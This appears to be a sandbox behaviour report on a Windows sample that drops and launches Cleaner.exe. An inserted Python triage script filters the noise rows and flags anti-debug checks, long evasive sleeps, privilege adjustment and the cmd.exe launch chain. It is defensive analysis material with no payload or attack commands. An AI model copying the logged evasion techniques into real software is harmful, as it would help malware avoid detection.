                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe TID: 5340 Thread sleep count: 119 > 30
Source: C:\Users\user\Desktop\file.exe TID: 5340 Thread sleep time: -71400s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 4692 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Bunifu_UI_v1.5.3.dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\dll[1]
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe File Volume queried: C:\ FullSizeInformation (2 identical rows)
Source: Amcache.hve.30.dr Binary or memory string: VMware
Source: Amcache.hve.30.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.30.dr Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.30.dr Binary or memory string: VMware Virtual USB Mouse
Source: Cleaner.exe, 00000021.00000002.658091156.0000024B7E02C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[
Source: Amcache.hve.30.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.30.dr Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: file.exe, 00000000.00000000.308421884.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW4
Source: Amcache.hve.30.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.30.dr Binary or memory string: VMware7,1
Source: Amcache.hve.30.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.30.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: file.exe, 00000000.00000000.306966127.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.30.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.30.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.30.dr Binary or memory string: VMware, Inc.me
Source: Amcache.hve.30.dr Binary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
Source: Amcache.hve.30.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.30.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.30.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort (4 identical rows)
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe
Source: C:\Users\user\Desktop\file.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe"
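The rows above are raw behaviour events, and three of them are easy to over-read. The SetErrorMode rows attributed to WerFault.exe (NOOPENFILEERRORBOX, FAILCRITICALERRORS | NOGPFAULTERRORBOX) are the crash reporter's own behaviour, not the sample's. The VMware strings sourced from Amcache.hve.30.dr come from a copy of the analysis VM's own Amcache hive (an inventory of the host's hardware and programs that was written out during crash reporting), so they say nothing about whether the sample looks for a hypervisor. The "Hyper-V RAW" string in file.exe's memory is the name of a Winsock catalog entry from mswsock.dll, as the Cleaner.exe row with the DLL path shows, so it is weak evidence at best. The script below is an added example (not Joe Sandbox code) that parses rows of this shape, collapses repeats, applies those caveats, and flags the stronger indicators: the ProcessDebugPort queries, the SeDebugPrivilege adjustment, the long sleeps, and the cmd.exe /c start launch of the dropped Cleaner.exe. It assumes the row layout "Source: <process or dump> <detail kind>: <value>" (with or without the space the extraction dropped) and treats the sleep values as milliseconds, which is an inference from the -60000s row matching "delay time: 60000" and from 119 sleeps x 600 ms = 71400. The sample rows are copied from the table above.

```python
"""Triage helper for Joe Sandbox-style behaviour rows (added example, not Joe Sandbox code).

Assumed row layout: "Source: <process path or dump name> <detail kind>: <value>".
The space between source and detail is optional because extraction often fuses them.
Sleep values are treated as milliseconds (an inference, see the lead-in).
"""
import re
from collections import Counter

DETAIL_KINDS = (
    "Process information set", "Process information queried", "Thread sleep count",
    "Thread sleep time", "Thread delayed", "Binary or memory string",
    "Process token adjusted", "Process queried", "Process created", "Memory allocated",
    "Queries volume information", "File Volume queried",
    "Dropped PE file which has not been started", "Last function",
)
ROW_RE = re.compile(
    r"^Source:\s*(?P<source>.+?)\s*(?P<kind>"
    + "|".join(re.escape(k) for k in DETAIL_KINDS)
    + r"):\s*(?P<value>.*)$"
)
VM_MARKERS = ("vmware", "hyper-v", "virtualbox", "vbox", "qemu")
SLEEP_THRESHOLD_MS = 30000  # the ">= -30000" threshold the report itself applies

# Constructed sample: rows copied from the report table (the first one left fused on purpose).
SAMPLE_ROWS = r"""
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\file.exe TID: 5340 Thread sleep count: 119 > 30
Source: C:\Users\user\Desktop\file.exe TID: 5340 Thread sleep time: -71400s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 4692 Thread sleep time: -60000s >= -30000s
Source: Amcache.hve.30.dr Binary or memory string: VMware Virtual USB Mouse
Source: file.exe, 00000000.00000000.308421884.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW4
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe
"""


def parse_rows(text):
    """Return (source, kind, value) triples for every row matching the layout."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            rows.append((m.group("source"), m.group("kind"), m.group("value")))
    return rows


def sleep_ms(value):
    """'-71400s >= -30000s' -> 71400: the report prints relative delays as negatives."""
    m = re.match(r"-?(\d+)", value.strip())
    return int(m.group(1)) if m else 0


def triage(text):
    """Collapse identical rows and turn the stronger ones into findings."""
    rows = parse_rows(text)
    counts = Counter(rows)
    findings = []
    for (source, kind, value), n in counts.items():
        proc = source.split()[0].rstrip(",")      # drop "TID: 5340" or the dump id
        from_dropped_file = proc.endswith(".dr")  # .dr = file written during analysis
        is_werfault = proc.lower().endswith("\\werfault.exe")
        if kind == "Process queried" and value == "DebugPort":
            findings.append(f"{proc}: queried ProcessDebugPort {n}x (anti-debug check)")
        elif kind == "Process token adjusted" and value == "Debug":
            findings.append(f"{proc}: enabled SeDebugPrivilege")
        elif kind == "Thread sleep time" and sleep_ms(value) >= SLEEP_THRESHOLD_MS:
            findings.append(f"{proc}: one thread slept {sleep_ms(value) / 1000:.1f}s in total (timeout evasion)")
        elif kind == "Binary or memory string" and any(k in value.lower() for k in VM_MARKERS):
            if from_dropped_file:
                continue  # Amcache.hve and similar describe the analysis VM itself, not the sample
            findings.append(f"{proc}: VM-related string in memory: {value!r} (weak: may belong to a loaded system DLL)")
        elif kind == "Process information set" and "NOGPFAULTERRORBOX" in value and not is_werfault:
            findings.append(f"{proc}: suppressed crash dialogs with SetErrorMode({value})")
        elif kind == "Process created" and "/c start" in value:
            findings.append(f"{proc}: launched a dropped file through cmd.exe: {value}")
    return {"rows": len(rows), "unique": len(counts), "findings": findings}


if __name__ == "__main__":
    result = triage(SAMPLE_ROWS)
    print(f"{result['rows']} rows, {result['unique']} unique")
    for line in result["findings"]:
        print(" -", line)
```

Run it against a report's behaviour table pasted into a file and the WerFault noise and the Amcache hardware inventory drop out, leaving the six events worth writing up: the two sleep totals over the 30 s threshold, the Winsock-derived Hyper-V string (flagged as weak), the SeDebugPrivilege adjustment in Cleaner.exe, the repeated ProcessDebugPort query, and the cmd.exe /c start launch chain.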
Source: file.exe, 00000000.00000000.261638552.000000000241E000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000000.306725027.000000000241E000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: file.exe, 00000000.00000000.261638552.000000000241E000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000000.306725027.000000000241E000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: F.program manager^
Source: file.exe, 00000000.00000000.261638552.000000000241E000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000000.306725027.000000000241E000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: program manager
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Bunifu_UI_v1.5.3.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
